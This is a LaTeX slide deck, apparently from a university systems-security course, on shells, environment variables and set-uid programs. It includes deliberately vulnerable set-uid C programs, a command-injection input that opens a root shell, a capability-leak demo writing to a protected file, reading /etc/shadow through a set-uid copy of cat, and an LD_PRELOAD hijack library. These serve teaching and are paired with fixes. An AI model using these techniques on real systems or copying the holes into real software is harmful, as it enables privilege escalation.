\input{../common/header.tex}
\input{../common/cmds.tex}

\title{Ch. 5 - Shells and Set-uid Programs}

\begin{document}
\input{../common/front.tex}

\section{Introduction}

\begin{frame}
\frametitle{The need for privileges}
\begin{itemize}[<+->]
\item Every OS needs privileged programs
	\begin{itemize}
	\item Otherwise, how do we change a password?
	\end{itemize}
\item These programs are often attack targets
    \begin{itemize}
    \item Especially sells: programs that launch programs
    \end{itemize}
\end{itemize}
\begin{exampleblock}<+->{Question}
	\begin{itemize}[<+->]
	\item How to properly grant access to sensitive services / data ?
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Obviously, restrictions are needed
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{The password dilemma}
\begin{itemize}
\onslide<1-> \item In Linux, passwords are stored in \texttt{/etc/shadow}
	\begin{itemize}
	\onslide<2-> \item The shadow file
	\end{itemize}
\onslide<3-> \item To change a password, the shadow file needs to be eventually modified
\end{itemize}
\onslide<4->
\frame{
\begin{minipage}{\textwidth}
\vspace*{.2em}
\texttt{\!\!\!
serra@Portable-Serra:$\sim$\$ ls -al /etc/shadow\\
-rw-r----- 1 root shadow 1555 déc 19  2018 /etc/shadow}
\vspace*{.2em}
\end{minipage}
}
\begin{itemize}
\onslide<5-> \item How to allow non-root users to change their passwords ?
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Possible solutions}
\begin{alertblock}<+->{Wrong idea}
	\begin{itemize}[<+->]
	\item Make the shadow file writable by everybody
	\end{itemize}
\end{alertblock}
\begin{itemize}[<+->]
\item If a normal user can write to the shadow file, they can change other people's passwords
\end{itemize}
\begin{exampleblock}<+->{Other idea}
	\begin{itemize}[<+->]
	\item Allow non-root users to change their record only
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item In most OS, access control is enforced on file level
	\begin{itemize}
	\item The OS decides whether a user can access a file
	\item ... but it does not restrict what part of a file can be accessed
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{A 2-tier approach}
\begin{itemize}[<+->]
\item No access control is not an option
\item Fine granularity can be \emph{very} complicated
\item Because of the lack of granularity, access control in OSes tends to be over-protective
\end{itemize}
\begin{exampleblock}<+->{Idea}
	\begin{itemize}[<+->]
	\item Ask "someone" to perform a restricted action "for you"
	\item Poke a hole in your security shell and allow users to go through that hole following a specific procedure
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Usually, some programs are privileged and are restricted to access some resources
	\begin{itemize}
	\item The shadow file can only be written by root
	\item \texttt{passwd} is privileged and can modify the shadow file
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Two approaches}
\begin{itemize}[<+->]
\item Two common approaches : daemons and Set-UID programs
\end{itemize}
\begin{exampleblock}<+->{Daemon}
	\begin{itemize}
	\item Program running in background
	\item Windows : service
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item A root daemon can change the password
\item When a program wants to change a password, it sends a request to such daemon
	\begin{itemize}
	\item The root daemon is allowed to change the password
	\item The daemon changes the password for the program
	\end{itemize}
\item Other approach : Set-UID program
	\begin{itemize}
	\item Idea : set a special bit to mark a program as special
	\item Treated specially when running
	\end{itemize}
\item Widely used in Unix systems
\end{itemize}
\end{frame}

\section{Shells}

\begin{frame}
\frametitle{What it is}
\begin{itemize}[<+->]
\item A command line interpreter in OSs
    \begin{itemize}
    \item Reads commands from the console or a terminal window, and executes them
    \end{itemize}
\item Interface between a user and the OS
\item Several types of shell exist
    \begin{itemize}
    \item \texttt{sh}, \texttt{bash}, \texttt{csh}, MS PowerShell
    \end{itemize}
\item Also allows to define functions
    \begin{itemize}
    \item ... for the same reason we use functions in programming languages
    \end{itemize}
\item When executing commands, shells either
    \begin{itemize}
    \item create child processes
    \item open new shells that create child processes
    \end{itemize}
\item Strong inheritance relationship between parent and children
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Shell variables and environment variables}
\begin{alertblock}<+->{Important remark}
	\begin{itemize}[<+->]
	\item They are \emph{not} the same
	\end{itemize}
\end{alertblock}
\begin{itemize}[<+->]
\item Shell variables are internal variables maintained by a shell program
	\begin{itemize}
	\item They affect the shell's behaviour
	\item They can be used in scripts
	\end{itemize}
\item Environment variables are internal variables maintained by a process
\item When a shell starts, it it defines a shell variable for each environment variable of the process
	\begin{itemize}
	\item Uses the same names and copies values
	\end{itemize}
\item Change made to a shell variable will not change an environment variable
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ strings /proc/$$/environ | grep LOGNAME
LOGNAME=ssd
ssd@ssd-vb:~$ echo $LOGNAME
LOGNAME=ssd
ssd@ssd-vb:~$ LOGNAME=bob
ssd@ssd-vb:~$ echo $LOGNAME
bob
ssd@ssd-vb:~$ strings /proc/$$/environ | grep LOGNAME
LOGNAME=ssd
ssd@ssd-vb:~$ unset LOGNAME
ssd@ssd-vb:~$ echo $LOGNAME

ssd@ssd-vb:~$ strings /proc/$$/environ | grep LOGNAME
LOGNAME=ssd
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Shell variables of environment of children}
\begin{itemize}[<+->]
\item The most basic use of a shell is to execute programs
\item When doing so, the program is executed as a child process
	\begin{itemize}
	\item Usually \texttt{fork()} followed by \texttt{execve}
	\end{itemize}
\item A shell will explicitly set the environment variables for a program
	\begin{itemize}
	\item \texttt{bash} builds an array of name-value pairs
	\item Then, it sets this array as the param \texttt{envp}
	\end{itemize}
\item Not all shell variables are included
\end{itemize}
\begin{exampleblock}<+->{The example of \texttt{bash}}
	\begin{itemize}[<+->]
	\item Shell variables copied from environment variables
		\begin{itemize}
		\item Those we didn't \texttt{unset}
		\end{itemize}
	\item User-defined variables marked by \texttt{export}
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ strings /proc/$$/environ | grep LOGNAME
LOGNAME=ssd
ssd@ssd-vb:~$ LOGNAME2=bob
ssd@ssd-vb:~$ export LOGNAME2
ssd@ssd-vb:~$ env | grep LOGNAME
LOGNAME=ssd
LOGNAME2=bob
ssd@ssd-vb:~$ unset LOGNAME
ssd@ssd-vb:~$ env | grep LOGNAME
LOGNAME2=bob
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Commands explanation}
\begin{itemize}
\item \texttt{/proc} is a virtual file system in Linux
\item Contains a directory for each process
	\begin{itemize}
	\item Process 2342 is placed in \texttt{proc/2342}
	\end{itemize}
\item \texttt{\$\$} is a bash variable containing the id of the current process
\item Each process has a virtual file called \texttt{environ} containing its environment variables
\item \texttt{strings} can print out the text in this virtual file
\item When we call \texttt{env} in a bash shell, it prints out the environment variables of the current process
	\begin{itemize}
	\item Since it is not built-in, it is started as a child process
	\item Consequently, it can be used to check the environment of a child process started by a bash shell
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Defining functions}
\begin{lstlisting}[style=bash]
serra@serra-aurora:~$ foo() { echo "Calling foo"; }
serra@serra-aurora:~$ declare -f foo
foo ()
{
    echo "Calling foo"
}
serra@serra-aurora:~$ foo
Calling foo
serra@serra-aurora:~$ unset -f foo
serra@serra-aurora:~$ declare -f foo
serra@serra-aurora:~$ foo
Command 'foo' not found, did you mean:
 ...
serra@serra-aurora:~$
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Passing functions to child process}
\begin{itemize}[<+->]
\item There are two ways for a child process to get a function from its parent
    \begin{enumerate}
    \item Define a function in the parent process and \texttt{export} it
    \item Define a shell variable with special content
    \end{enumerate}
\item Have the parent \emph{shell} forks a new child and runs a shell in the child process
\item Function definition will be passed down to the child process
\end{itemize}
\begin{exampleblock}<+->{What happens}
    \begin{itemize}[<+->]
    \item Both methods actually use environment variables
    \end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item In the first case, when the parent shell creates a new process, it passes the function as an environment variable to the child
\item In the second case, we already have a (shell) variable
    \begin{itemize}
    \item The parent also doesn't have to be a shell
    \end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Illustration}
\begin{itemize}
\item First case: define a function in the parent and \texttt{export}
\end{itemize}
\begin{lstlisting}[style=bash]
serra@serra-aurora:~$ echo $$
102082
serra@serra-aurora:~$ foo() { echo "Calling foo"; }
serra@serra-aurora:~$ declare -f foo
foo ()
{
    echo "Calling foo"
}
serra@serra-aurora:~$ foo
Calling foo
serra@serra-aurora:~$ export -f foo
serra@serra-aurora:~$ bash
serra@serra-aurora:~$ echo $$
102098
serra@serra-aurora:~$ declare -f foo
foo ()
{
    echo "Calling foo"
}
serra@serra-aurora:~$ foo
Calling foo
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Illustration}
\begin{itemize}
\item Second case: define a shell variable
\end{itemize}
\begin{lstlisting}[style=bash]
serra@serra-aurora:~$ echo $$
102082
serra@serra-aurora:~$ foo='() { echo "Calling foo"; }'
serra@serra-aurora:~$ echo $foo
() { echo "Calling foo"; }
serra@serra-aurora:~$ foo
Command 'foo' not found, did you mean:
  ...
serra@serra-aurora:~$ declare -f foo
serra@serra-aurora:~$ export foo
serra@serra-aurora:~$ bash #if vulnerable, 'stuff' will happen
serra@serra-aurora:~$ echo $$
102098
serra@serra-aurora:~$ echo $foo

serra@serra-aurora:~$ declare -f foo
foo ()
{
    echo "Calling foo"
}
serra@serra-aurora:~$ foo
Calling foo
\end{lstlisting}
\end{frame}

\section{The set-uid mechanism}

\begin{frame}
\frametitle{The goal}
\begin{exampleblock}<+->{What do we want}
	\begin{itemize}[<+->]
	\item We want to temporarily grant superuser rights to a regular user
	\item We want these temporary rights to only allow to perform a specific task
		\begin{itemize}
		\item Not an arbitrary one
		\end{itemize}
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item Run a background process handling all password-changing requests : daemon
\item Escalate temporary rights to a regular user
	\begin{itemize}
	\item The process running the privileged operation belongs to a normal user
	\item Not to  super-user like in the daemon approach
	\item The behaviour of such process is restricted : it can only do the intended task
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{The set-UID mechanism}
\begin{itemize}[<+->]
\item A set-UID program is a regular program which is marked with a special bit
	\begin{itemize}

	\item The set-UID bit
	\end{itemize}
\item Such a process is treated differently by the OS when running
\item The difference lies in the user IDs of the process
\item in Unix, a process has three user IDs
	\begin{enumerate}
	\item real user ID : who runs the process
	\item effective user ID : used for access control
	\item saved user id
	\end{enumerate}
\item Non set-UID : real user ID = effective user ID
\item set-UID : the effective user ID depends on the user \emph{owning} the program
	\begin{itemize}
	\item If owned by root, the effective user id equals $0$
	\item Such a process is then executed by a normal user but has root privileges
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example : the  \texttt{id} program}
\begin{itemize}
\item Prints the id of a process
\item We copy the command program and change the owner to root
	\begin{itemize}
	\item Still not privileged
	\end{itemize}
\end{itemize}
\begin{lstlisting}[style=bash]
serra@Portable-Serra:~$ cp /usr/bin/id ./myid
serra@Portable-Serra:~$ sudo chown root myid
serra@Portable-Serra:~$ ./myid
uid=1000(serra) gid=1000(serra) groupes=1000(serra), ...
\end{lstlisting}
\begin{itemize}
\item Only the user ID is printed out
	\begin{itemize}
	\item Effective user ID = real user id
	\end{itemize}
\item We then turn on the set-uid bit
\end{itemize}
\begin{lstlisting}[style=bash]
serra@Portable-Serra:~$ sudo chmod 4755 myid
serra@Portable-Serra:~$ ./myid
uid=1000(serra) gid=1000(serra) euid=0(root) groupes=1000(serra), ...
\end{lstlisting}
\begin{itemize}
\item Now it also prints the effective user id
	\begin{itemize}
	\item It has root privileges
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example of execution : \texttt{cat /etc/shadow}}
\begin{lstlisting}[style=bash]
serra@Portable-Serra:~$ cp /bin/cat ./mycat
serra@Portable-Serra:~$ sudo chown root mycat
serra@Portable-Serra:~$ ls -l mycat
-rwxr-xr-x 1 root serra 35064 sep 24 07:43 mycat
serra@Portable-Serra:~$ ./mycat /etc/shadow
./mycat: /etc/shadow: Permission non accordée
\end{lstlisting}
\begin{itemize}
\item Let us now turn on the set-UID bit
\end{itemize}
\begin{lstlisting}[style=bash]
serra@Portable-Serra:~$ sudo chmod 4755 mycat
serra@Portable-Serra:~$ ./mycat /etc/shadow
root:!:16734:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
...
\end{lstlisting}
\begin{itemize}
\item Let us change the owner back to serra without unsetting the set-uid bit
\end{itemize}
\begin{lstlisting}[style=bash]
serra@Portable-Serra:~$ sudo chown serra mycat
serra@Portable-Serra:~$ sudo chmod 4755 mycat
serra@Portable-Serra:~$ ./mycat /etc/shadow
./mycat: /etc/shadow: Permission non accordée
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Safety}
\begin{itemize}[<+->]
\item Not the same as granting super-user rights to anyone
\item With the set-uid mechanism, a user can only what is included in the program
\item A user cannot do whatever he/she wants with the escalated privileges
\end{itemize}
\begin{alertblock}<+->{What is not safe}
	\begin{itemize}[<+->]
	\item Turn all programs into set-uid programs
	\end{itemize}
\end{alertblock}
\begin{itemize}[<+->]
\item Example : \texttt{/bin/sh}
	\begin{itemize}
	\item We can run other programs
	\end{itemize}
\end{itemize}
\end{frame}

\section{Basic attacks}

\begin{frame}
\frametitle{Capability leaking}
\begin{exampleblock}<+->{Principle of least privilege}
	\begin{itemize}[<+->]
	\item A program must always run with the least privileges it need to perform its task
	\end{itemize}
\end{exampleblock}
\begin{itemize}[<+->]
\item It is a good practice to downgrade yourself when you don't need rights anymore
	\begin{itemize}
	\item \texttt{su} a a privileged set-uid program
	\item Changes user $a$ to user $b$ is $a$ knows the password of $b$
	\item When \texttt{su} starts, euid=0
	\item Then, the process downgrades itself so that uid=euid
	\item Finally, it runs the shell of $b$
	\end{itemize}
\item When privileges are downgraded, some capabilities are not removed
\item The capabilities may still be performed by non privileged programs
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{lstlisting}
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>

int main()
{
	int fd = -1;

	//assume /etc/zzz is important, owned by root and chmoded 0644
	fd = open("/etc/zzz", O_RDWR | O_APPEND);
	if(fd == -1)
	{
		printf("Cannot open file");
		return 0;
	}
	printf("fd is %d\n", fd);

	//downgrades rights
	setuid(getuid());

	//run /bin/sh
	char * v[2];
	v[0] = "/bin/sh";
	v[1] = 0;
	execve(v[0], v, 0);
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Capability leak attack}
\begin{itemize}
\item We forget to close the file
\end{itemize}
\begin{lstlisting}[style=bash]
serra@Portable-Serra:~$ sudo chown root ./cap_leak
serra@Portable-Serra:~$ sudo chmod 4755 ./cap_leak
serra@Portable-Serra:~$ ls -l /etc/zzz cap_leak
-rwsr-xr-x 1 root serra 8528 sep 25 14:50 cap_leak
-rw-r--r-- 1 root root    10 sep 25 14:27 /etc/zzz
serra@Portable-Serra:~$ cat /etc/zzz
aaaaaaaaa
serra@Portable-Serra:~$ echo bbbbbbbbbbb > /etc/zzz
bash: /etc/zzz: Permission non accordée
serra@Portable-Serra:~$ ./cap_leak
fd is 3
$ echo ccccccccc >& 3
$ exit
serra@Portable-Serra:~$ cat /etc/zzz
aaaaaaaaa
ccccccccc
\end{lstlisting}
\begin{itemize}
\item We should invalidate \texttt{fd} by closing the file with \texttt{close(fd)}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Attack vector}
\begin{itemize}[<+->]
\item It is common to invoke system commands inside a program
\item When the program is a set-uid program, extreme caution must be taken
	\begin{itemize}
	\item We may end up executing arbitrary commands provided by a user
	\item Completely bypasses security
	\end{itemize}
\item Users are not supposed to run arbitrary commands
	\begin{itemize}
	\item External commands are provided by the set-uid program
	\end{itemize}
\item Users provide inputs
\item These inputs are not to be trusted
	\begin{itemize}
	\item ... they could be commands
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example in \texttt{C}}
\begin{itemize}
\item Write a set-uid program able to print the content of any file
\end{itemize}
\begin{lstlisting}
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int c, char* args[])
{
	if(c < 2)
	{
		printf("You must provide a file name\n");
		return 1;
	}

	const char * cat = "/bin/cat";
	char * cmd = malloc(strlen(cat) + strlen(args[1]) + 2);
	sprintf(cmd, "%s %s", cat, args[1]);

	system(cmd);
}
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{The problem : \texttt{system()}}
\begin{itemize}[<+->]
\item System executes \texttt{/bin/sh -c cmd}
\item The command is not executed directly by the program
	\begin{itemize}
	\item The shell is executed first
	\item The shell takes the command as an input
	\item The shell \emph{parses} the command
	\item The shell executes the command
	\end{itemize}
\end{itemize}
\begin{alertblock}<+->{It is too powerful}
	\begin{itemize}[<+->]
	\item It can do much more beyond executing a \emph{single} command
	\end{itemize}
\end{alertblock}
\begin{itemize}[<+->]
\item What if we input \texttt{"myfile; /bin/sh"} ?
	\begin{itemize}
	\item We first execute \texttt{/bin/cat myfile}
	\item We then execute \texttt{/bin/sh}
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{lstlisting}[style=bash]
serra@Portable-Serra:~$ sudo chown root ./catall
serra@Portable-Serra:~$ sudo chmod 4755 ./catall
serra@Portable-Serra:~$ ls -l cat_all
-rwsr-xr-x 1 root serra 8480 sep 25 18:23 catall
serra@Portable-Serra:~$ ./catall /etc/shadow
root:!:16734:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
...
serra@Portable-Serra:~$ ./catall "foo;/bin/sh -p"
/bin/cat: brol: Aucun fichier ou dossier de ce type
#
#id
uid=1000(serra) gid=1000(serra) euid=0(root) groupes=1000(serra), ...
\end{lstlisting}
\end{frame}

%\begin{frame}
%\frametitle{Workaround}
%\begin{exampleblock}<+->{Principle of isolation}
%	\begin{itemize}[<+->]
%	\item Data must be clearly isolated from code
%	\end{itemize}
%\end{exampleblock}
%\begin{itemize}[<+->]
%\item Do not execute arbitrary "stuff"
%\item Do not parse arbitrary input
%\end{itemize}
%\begin{exampleblock}<+->{Hygiene}
%\begin{itemize}[<+->]
%\item Sanitise
%	\begin{itemize}
%	\item inputs
%	\item environment
%	\end{itemize}
%\end{itemize}
%\end{exampleblock}
%\begin{itemize}[<+->]
%\item In \texttt{C} : use the \texttt{exec()} family of functions
%\end{itemize}
%\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{lstlisting}
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int c, char* args[])
{
	if(c < 2)
	{
		printf("You must provide a file name\n");
		return 1;
	}

	char * cmd[] = {"/bin/cat", args[1], 0};

	execve(cmd[0], cmd, 0);
}
\end{lstlisting}
\end{frame}

%\begin{frame}
%\frametitle{In other languages}
%\begin{itemize}
%\onslide<1-> \item Both inputs and data must be sanitised
%\onslide<2-> \item \texttt{PHP} : do not use \texttt{system}
%\onslide<3-> \item \texttt{MySql} : do not use \texttt{multi\_query}
%\end{itemize}
%\begin{center}
%\visible<4-|handout:1>{\includegraphics[width=.5\textwidth]{pics/injection.jpg}}
%\end{center}
%\begin{itemize}
%\item Note that execve, prepared statements, etc., are safe \emph{but} do not sanitise inputs
%\end{itemize}
%\end{frame}

\section{Environment variables}\label{sec:env-var}

\begin{frame}
\frametitle{Environment variables}
\begin{itemize}[<+->]
\item Environment variables are a set of dynamic pairs "name-value" that every process has
\item They define the "default environment" of a process
\item They affect the behaviour of a process
	\begin{itemize}
	\item \texttt{PATH} tells were executables are stored
	\end{itemize}
\end{itemize}
\begin{alertblock}<+->{Problem}
	\begin{itemize}[<+->]
	\item Most of the time, they are used without explicit call from the developer
	\item If the developer is not aware, how can (s)he sanitise them ?
	\end{itemize}
\end{alertblock}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Accessing environment variables}
\begin{itemize}
\item Solution 1 : use the \texttt{environ} extern global variable
\item Solution 2 : use the \texttt{envp} variable inside \texttt{main}
\item \texttt{NULL} terminated arrays
\end{itemize}
\begin{lstlisting}
extern char** environ;

int main()
{
	for(int i = 0; environ[i] != NULL; i++)
		printf("%s\n", environ[i]);
}
\end{lstlisting}
\begin{lstlisting}
int main(int argc, char* argv[], char* envp[])
{
	for(int i = 0; envp[i] != NULL; i++)
		printf("%s\n", envp[i]);
}
\end{lstlisting}
\begin{itemize}
\item Strong recommendation : use \texttt{environ}
\item We can also use the \texttt{getenv}, \texttt{putenv}, \texttt{setenv}, \texttt{unsetenv} functions
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{How a process gets its environment variables}
\begin{itemize}[<+->]
\item Processes are created using
	\begin{itemize}
	\item the \texttt{fork} system call (new processes)
	\item the \texttt{execve} system call (call inside program)
	\end{itemize}
\item With \texttt{fork}, memory of the parent is duplicated
	\begin{itemize}
	\item The child inherits the environments variables of the parent
	\end{itemize}
\item With \texttt{execve}, the developer specifies what is inherited
	\begin{itemize}
	\item By default, this system call overwrites the currents process' memory
	\item If the developer wants something passed, it has to be specified explicitly
	\end{itemize}
\item \tiny{\lstinline|int execve(const char* filename, char* const argv[], char* const envp[])|}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{lstlisting}
extern char** environ;

int main(int argc, char* argv[])
{
	if(argc < 2)
		fprintf(stderr, "Error\n");

	char * const args[2] = {"/usr/bin/env", NULL};
	char * const newenv[3] = {"AAA=aaa", "BBB=bbb", NULL};

	int choice = atoi(argv[1]);
	if(choice == 1)
		execve(args[0], args, NULL); //we pass nothing
	else if(choice == 2)
		execve(args[0], args, newenv);
	else if(choice == 3)
		execve(args[0], args, environ);
	else
		printf("Error\n");
}
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{Memory location of environment variables}
\begin{itemize}
\item Environment variables are stored on the stack
\end{itemize}
\begin{center}
\includegraphics[width=9cm] {pics/env.pdf}
\end{center}
\end{frame}

\begin{frame}
\frametitle{Remarks}
\begin{itemize}[<+->]
\item If changes are made to environments variables, there might not be enough space
	\begin{itemize}
	\item Adding, deleting, modifying values
	\end{itemize}
\item If it is the case : two possibilities
	\begin{enumerate}
	\item Crash, or undetermined behaviour
	\item The entire environment variable may change
	\end{enumerate}
\item In the second case, \texttt{environ} is changed
	\begin{itemize}
	\item Not \texttt{envp}
	\end{itemize}
\item This is why is is better to use \texttt{environ}
\item Use functions \texttt{setenv}, \texttt{putenv}, etc.
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Attack surface}
\begin{itemize}[<+->]
\item Environment variables have to be used as inputs to modify the behaviour of a program
\end{itemize}
\begin{alertblock}<+->{Problem}
	\begin{itemize}[<+->]
	\item Most of the time, they are used without explicit call from the developer
	\item If the developer is not aware, how can (s)he sanitise them ?
	\end{itemize}
\end{alertblock}
\begin{itemize}[<+->]
\item 4 attack surfaces
	\begin{itemize}
	\item Linker
	\item External programs
	\item Libraries
	\item Application code
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Linking}
\begin{itemize}[<+->]
\item An important step when preparing a program for execution is linking
\item The purpose of linking is to add external library code referenced in the program
\item This external code is \emph{linked} to the program so there are no missing dependencies
\item Linking can be done
	\begin{itemize}
	\item at compile time : static linking
	\item at runtime : dynamic linking
	\end{itemize}
\item Dynamic linking uses environment variables, which become part of the attack surface
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Static and dynamic linking}
\begin{itemize}[<+->]
\item Consider a "hello world" \texttt{C} program
\end{itemize}
\begin{exampleblock}<+->{Static linking}
	\begin{itemize}[<+->]
	\item The compiler (\texttt{gcc -static}) combines the program's code along with the library code containing \texttt{printf}
		\begin{itemize}
		\item ... and all its dependencies
		\end{itemize}
	\item The executable is self-sufficient, without any dependencies
		\begin{itemize}
		\item If several executables use \texttt{printf}, they all have a copy of it
		\end{itemize}
	\end{itemize}
\end{exampleblock}
\begin{exampleblock}<+->{Dynamic linking}
	\begin{itemize}[<+->]
	\item Dynamic linking is performed during runtime
	\item Solves the problems associated with static linking
	\item Usually called \emph{shared} libraries (unix \texttt{.so} and windows \texttt{DLL})
	\end{itemize}
\end{exampleblock}
\end{frame}

\begin{frame}
\frametitle{Dynamic linking}
\begin{enumerate}[<+->]
\item When a program using dynamic linking is called, it is first loaded into memory
	\begin{itemize}
	\item For instance, with \texttt{execve}
	\end{itemize}
\item On Linux, the \texttt{ELF} format for executables has a \texttt{.interp} section specifying the name of the dynamic linker
	\begin{itemize}
	\item Itself a \texttt{.so} : \texttt{ld-linux.so}
	\end{itemize}
\item The program gives hand to the dynamic liker
	\begin{itemize}
	\item Finds the implementation of \texttt{printf}
	\end{itemize}
\item The linker binds the invocation of shared functions from the executable to actual implementations from libraries
\item The linker passes control to \texttt{main}
\end{enumerate}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Example}
\begin{itemize}
\item Use \texttt{ldd} to see what libraries a program depends on
\end{itemize}
\begin{lstlisting}[style=bash]
serra@Portable-Serra:~$ gcc -static -o hello_static hello_world.c
serra@Portable-Serra:~$ gcc -o hello_dynamic hello_world.c
serra@Portable-Serra:~$ ls -al hello_dynamic hello_static
-rwxr-xr-x 1 serra serra   8304 oct  8 21:59 hello_dynamic
-rwxr-xr-x 1 serra serra 844704 oct  8 21:59 hello_static
serra@Portable-Serra:~$ ldd hello_static
	n'est pas un exécutable dynamique
serra@Portable-Serra:~$ ldd hello_dynamic
	linux-vdso.so.1 (0x00007ffebebc2000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f08754bc000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f0875aaf000)
\end{lstlisting}
\end{frame}

\begin{frame}
\frametitle{The cost of dynamic linking}
\begin{itemize}[<+->]
\item With dynamic linking, part of a program's code is undecided at compile time
\item The missing code is decided at runtime
\end{itemize}
\begin{alertblock}<+->{Problem}
	\begin{itemize}[<+->]
	\item The developer has control at compile time, and the user at runtime
	\end{itemize}
\end{alertblock}
\begin{itemize}[<+->]
\item What if a user can influence the missing code in a privileged program ?
	\begin{itemize}
	\item Terrible for set-uid programs
	\end{itemize}
\item Possible attacks through environment variables
\end{itemize}
\end{frame}

\begin{frame}
\frametitle{Attacks via dynamic linker}
\begin{itemize}[<+->]
\item On Linux, the dynamic linker searches libraries in
	\begin{enumerate}
	\item default folders
	\item folders specified by \texttt{LD\_PRELOAD}
	\item folders specified by \texttt{LD\_LIBRARY\_PATH}
	\end{enumerate}
\item These two environment variables can be set by users
\item They can specify \emph{their} implementation of system functions
\item If the considered program is set-uid, these variables combined with dynamic linking can lead to security breaches
\end{itemize}
\end{frame}

\begin{frametitle}[containsverbatim]
\frametitle{Example}
\begin{itemize}
\item Attacked program
\end{itemize}
\begin{lstlisting}
#include <unistd.h>

int main()
{
	sleep(5);
}
\end{lstlisting}
\begin{itemize}
\item Malicious code
\end{itemize}
\begin{lstlisting}
#include <stdio.h>

void sleep(int s)
{
	printf("I am evil\n");
}
\end{lstlisting}
\end{frametitle}

\begin{frame}[containsverbatim]
\frametitle{Execution}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ gcc -o main-sleep main-sleep.c
ssd@ssd-vb:~$ ./main-sleep
ssd@ssd-vb:~$ gcc -c malicious-sleep.c
ssd@ssd-vb:~$ gcc -shared -o libmymaliciouslib.so malicious-sleep.o
ssd@ssd-vb:~$ ls -l main-sleep* *malicious*
-rwxr-xr-x 1 ssd ssd 7912 oct  8 22:46 libmymaliciouslib.so
-rwxr-xr-x 1 ssd ssd 8304 oct  8 22:46 main-sleep
-rw-rw-r-- 1 ssd ssd   48 oct  8 22:44 main-sleep.c
-rw-rw-r-- 1 ssd ssd   66 oct  8 22:45 malicious-sleep.c
-rw-r--r-- 1 ssd ssd 1552 oct  8 22:46 malicious-sleep.o
ssd@ssd-vb:~$ export LD_PRELOAD=./libmymaliciouslib.so
ssd@ssd-vb:~$ ./main-sleep
I am evil
ssd@ssd-vb:~$ unset LD_PRELOAD
ssd@ssd-vb:~$ ./main-sleep
ssd@ssd-vb:~$
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Vector : set-uid program}
\begin{itemize}
\item On a set-uid program, this allows users to run arbitrary code
\item On OSX, vulnerable until 2015
	\begin{itemize}
	\item The dynamic linker is set-uid and allows to write a log
	\item That log can be a protected file
	\item The linker did not close the file (fil descriptor is leaked)
	\end{itemize}
\item On Linux, the dynamic linker provides protection
	\begin{itemize}
	\item Ignores \texttt{LD\_PRELOAD} and \texttt{LD\_LIBRARY\_PATH} when \texttt{uid} $\neq$ \texttt{euid}
	\end{itemize}
\end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
\frametitle{Illustration}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ sudo chown root main-sleep
ssd@ssd-vb:~$ sudo chmod 4755 main-sleep
ssd@ssd-vb:~$ ls -sl main-sleep
-rwsr-xr-x 1 root ssd 8304 oct  8 22:46 main-sleep
ssd@ssd-vb:~$ export LD_PRELOAD=./libmymaliciouslib.so
ssd@ssd-vb:~$ ./main-sleep
ssd@ssd-vb:~$
\end{lstlisting}
\begin{itemize}
\item The malicious function \texttt{sleep} is not invoked
\end{itemize}
\begin{lstlisting}[style=bash]
ssd@ssd-vb:~$ cp /usr/bin/env ./myenv
ssd@ssd-vb:~$ sudo chown root myenv
ssd@ssd-vb:~$ sudo chmod 4755 myenv
ssd@ssd-vb:~$ ls -sl myenv
